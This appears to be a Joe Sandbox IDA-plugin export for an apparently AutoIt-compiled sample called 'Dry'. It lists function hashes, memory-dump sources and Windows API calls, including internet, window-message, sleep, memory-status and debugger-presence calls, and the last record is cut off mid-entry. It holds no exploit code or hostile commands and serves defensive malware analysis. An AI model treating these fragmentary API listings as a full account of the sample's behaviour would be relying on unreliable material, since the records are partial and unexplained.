• Instruction ID: 08b6bdca0a142241fb8f2e5125e8f65c7459178642e3cbc1003fd7e04a96ebb1
• Opcode Fuzzy Hash: 716185ef836ba3bd3e0dbc1dd402446f5ac5c452832da2d60476d2997bb77b04
• Instruction Fuzzy Hash: 49514862A08102AAC7167714D9413EA2FE4FB55B40F608DD8F0A1522E8DF36CCE5DB86
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID:
• String ID: #
• API String ID: 0-1885708031
• Opcode ID: 2d790d9ea45bc2ce699edf19e242760af709ed66cbbd68bcacd21486c4578399
• Instruction ID: a257b4df2f2ef05f6d52b1b53697beaf6bd7be57ec3b6113d556e6e546466bad
• Opcode Fuzzy Hash: 2d790d9ea45bc2ce699edf19e242760af709ed66cbbd68bcacd21486c4578399
• Instruction Fuzzy Hash: EF51337560434A9FCB25DF68C481AFA7BB0EF25310F2480A5F9959B3D0DB749D82CB62
APIs
• Sleep.KERNEL32(00000000), ref: 00AFF6DB
• GlobalMemoryStatusEx.KERNEL32(?), ref: 00AFF6F4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: 0da6e0f2a0521da476d1f902c27edaaa2fae8ed225363fe75628594df5182761
• Instruction ID: 1a2f17dc2b03f30913c8748e2376b177bdc22b62b5c2bb59fa48ee3ffe701ed3
• Opcode Fuzzy Hash: 0da6e0f2a0521da476d1f902c27edaaa2fae8ed225363fe75628594df5182761
• Instruction Fuzzy Hash: 705139718087889BD320EF11DD86BABB7E8FF84340F81485EF1D9521A5DF308529CB66
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: BuffCharUpper_wcslen
• String ID: CALLARGARRAY
• API String ID: 157775604-1150593374
• Opcode ID: 13321f9d8ca7d5b73df7f11afd45b44406305e49eeca832446df05fab29707d2
• Instruction ID: 22a303927056a24cd1184e747fda8fe475b58db2c3a5d9e69870f83343eaa1df
• Opcode Fuzzy Hash: 13321f9d8ca7d5b73df7f11afd45b44406305e49eeca832446df05fab29707d2
• Instruction Fuzzy Hash: 7441DC71E002099FCB04EFA9C8A59FEBBF5FF58364F1040A9E506A7251EB759D81CB90
APIs
• _wcslen.LIBCMT ref: 00B5DB75
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00B5DB7F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: CrackInternet_wcslen
• String ID: |
• API String ID: 596671847-2343686810
• Opcode ID: e278f35e3a4b566763a1aac930ceae0fe8cd748fe944f7391b36bde12a084e7d
• Instruction ID: 5acc9dee80068ed4e9e3a538536ff9c3cb5314e5aa9d033e6f733f69c80dec6f
• Opcode Fuzzy Hash: e278f35e3a4b566763a1aac930ceae0fe8cd748fe944f7391b36bde12a084e7d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4316F71C01109ABCF15EFA5CD85AEE7FB9FF04344F1000A5FC15A6162EB759A56CB60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00B740BD
                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B740F8
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                                    • String ID: static
                                                                                                                                                                                                                                                                                    • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                                                    • Opcode ID: d816919c59533e1f95ca21d52825cb9f375cb6831608bf45b502b77abd651b77
                                                                                                                                                                                                                                                                                    • Instruction ID: 24c495ebb85ab2bc47c86c7cd01240f0daa196337c225d3c311edcbbfc07018b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d816919c59533e1f95ca21d52825cb9f375cb6831608bf45b502b77abd651b77
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D317E71110604AADB24DF78CC80EFB77E9FF48764F008619FAA997190DB71AC81DBA0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00B750BD
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B750D2
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: '
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                                    • Opcode ID: 049fd2ea2fe1710490007abaa3c6c6c9a47009ec93435902cf9cba95f4ce53a3
                                                                                                                                                                                                                                                                                    • Instruction ID: 36a0016ecdb3ed0966f7427807dc16f873a27fc91b1034391bacf56c15b2154e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 049fd2ea2fe1710490007abaa3c6c6c9a47009ec93435902cf9cba95f4ce53a3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8631F874A0170A9FDB24CF69C981BDA7BF5FF49300F1081AAE918AB351D7B1A945CF90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B73D18
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B73D23
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: Combobox
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2096851135
                                                                                                                                                                                                                                                                                    • Opcode ID: 98e2639211c285d251df97c44242cf0ae8e26ce2040bfa5af17bab0c659185d1
                                                                                                                                                                                                                                                                                    • Instruction ID: d7d086fa3df4feb7c4ce605191c6c64bac2ce0f2a93c99f87c028255e70d9f8c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98e2639211c285d251df97c44242cf0ae8e26ce2040bfa5af17bab0c659185d1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6011B671700208AFEF219F64DC81FAB3BEAEB947A4F108164F52997290D7719D51A7A0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AE78B1
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE7873: GetStockObject.GDI32(00000011), ref: 00AE78C5
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AE78CF
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00B74216
                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(00000012), ref: 00B74230
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
• Opcode ID: 350de5eaea5e4ea52db73b7ef020a47417f52dfcb1ab3d1dbd0d1cf447fa8d93
• Instruction ID: f9969ccf7e5c71aac9a9e11f66591eae0467c019391001f97fa6b13455c1715f
• Opcode Fuzzy Hash: 350de5eaea5e4ea52db73b7ef020a47417f52dfcb1ab3d1dbd0d1cf447fa8d93
• Instruction Fuzzy Hash: B0115972610209AFDB00DFA8CC45AEA7BF8EF08354F014914F969E3251D735E8609B50
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B5D7C2
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B5D7EB
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
• Opcode ID: 484d76f9a47b7d0eb6947b0b1cc712bd2a079f1c6f00f12e52e305c0f6cad485
• Instruction ID: 54676daf256e5653e955e8e79db9eb21f4a9ea18d8efed0a08647411ceb8e17f
• Opcode Fuzzy Hash: 484d76f9a47b7d0eb6947b0b1cc712bd2a079f1c6f00f12e52e305c0f6cad485
• Instruction Fuzzy Hash: 4E11297120623279D7384B628C85FF7BEDCEF167A6F004396F90983080D6608C48C6F0
APIs
  • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
• CharUpperBuffW.USER32(?,?,?), ref: 00B4761D
• _wcslen.LIBCMT ref: 00B47629
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: _wcslen$BuffCharUpper
• String ID: STOP
• API String ID: 1256254125-2411985666
• Opcode ID: b9a381f3b2c56471d45009351c94c69be76b69cece9fa08b87d3aeb5dae30908
• Instruction ID: 3c2bd9dc6f16f868aa29d58eb61cf3bd3d0a6a919293461bc3e36522cb6c1e1f
• Opcode Fuzzy Hash: b9a381f3b2c56471d45009351c94c69be76b69cece9fa08b87d3aeb5dae30908
• Instruction Fuzzy Hash: DB010032A589278FCB20AEBDDC808BF33F6EF6035070209A4E42193294EF31DA14E250
APIs
  • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
  • Part of subcall function 00B445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B44620
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B42699
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
• Opcode ID: cb02aabc6f93c2399b8608966434e7601eb9aff4ae67654b2b0d259f6d7495a3
• Instruction ID: f08edef83894f5015a333924037f5804f33b50d660e504dc9411c226016f6ca0
• Opcode Fuzzy Hash: cb02aabc6f93c2399b8608966434e7601eb9aff4ae67654b2b0d259f6d7495a3
• Instruction Fuzzy Hash: B7012875610114ABCB04EB64CC86DFE73F4EF46350B800659F832972D1DB715908E660
APIs
  • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
  • Part of subcall function 00B445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B44620
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00B42593
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
• Opcode ID: 6b9078eb91894c8c9a584f006e8761288615f402afc75f1a9f8e45d43ea1b316
• Instruction ID: ae3574e18882a0c1004f9f43fcbb2e859368dc3f28888a92c2eccd7585278c46
• Opcode Fuzzy Hash: 6b9078eb91894c8c9a584f006e8761288615f402afc75f1a9f8e45d43ea1b316
• Instruction Fuzzy Hash: A201F775A401056BCF05E790C967EFF73E8DF65340F94005AB812A7281DB509F08A6B1
APIs
  • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
  • Part of subcall function 00B445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B44620
• SendMessageW.USER32(?,00000182,?,00000000), ref: 00B42615
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                    • Opcode ID: c4cdd221d5ba49721e3db685842f66387ac4e74c45482740423e4a88794883a1
                                                                                                                                                                                                                                                                                    • Instruction ID: 5ec5b74cedca77f2291c9839dc2f6310028bce7e361da43574540e3aa31411ca
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4cdd221d5ba49721e3db685842f66387ac4e74c45482740423e4a88794883a1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7401A275A441056ACB05F7A4C946EFF77F8DF15340F940066B802A3281DB718F18B6B2
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B44620
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00B42720
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                    • Opcode ID: 60871ff55d09a14eb4af0fd36daf86db490f7d2f31aab2d9a466c3e65ee5f643
                                                                                                                                                                                                                                                                                    • Instruction ID: 4f6d666b4b5adb64835e514fe8ec75224c2575c49af76c607d424e608e16c0dc
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60871ff55d09a14eb4af0fd36daf86db490f7d2f31aab2d9a466c3e65ee5f643
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69F0F475A402146ACB05A7A48C86FFF73F8EF01340F840955F822A32C1DB605E08A270
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00B4146F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Message
                                                                                                                                                                                                                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                                    • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                                    • Opcode ID: cb82f107fa11fc8e425db5c4f5790ca4a9e0cb1075a303bc197363ad3e0c9aaa
                                                                                                                                                                                                                                                                                    • Instruction ID: 7d63c72f7af21b690e589527d984f8be3a4a9c23a4682e11e09e708268f9e1db
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb82f107fa11fc8e425db5c4f5790ca4a9e0cb1075a303bc197363ad3e0c9aaa
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ECE0D83224831536D2203794BC03F857AD48F05B91F11489AF75C794C24EF225905699
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AFFAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00B010E2,?,?,?,00AE100A), ref: 00AFFAD9
                                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00AE100A), ref: 00B010E6
                                                                                                                                                                                                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00AE100A), ref: 00B010F5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B010F0
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                                    • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                                    • Opcode ID: f7d669fcecc3e254ffd409552f9ce9eb997e6d6c13a6485da810396a33ac8ec0
                                                                                                                                                                                                                                                                                    • Instruction ID: c69bf4e70c96c48c5440062f564c9e06718e0bbb60232565d1423d8d57d85112
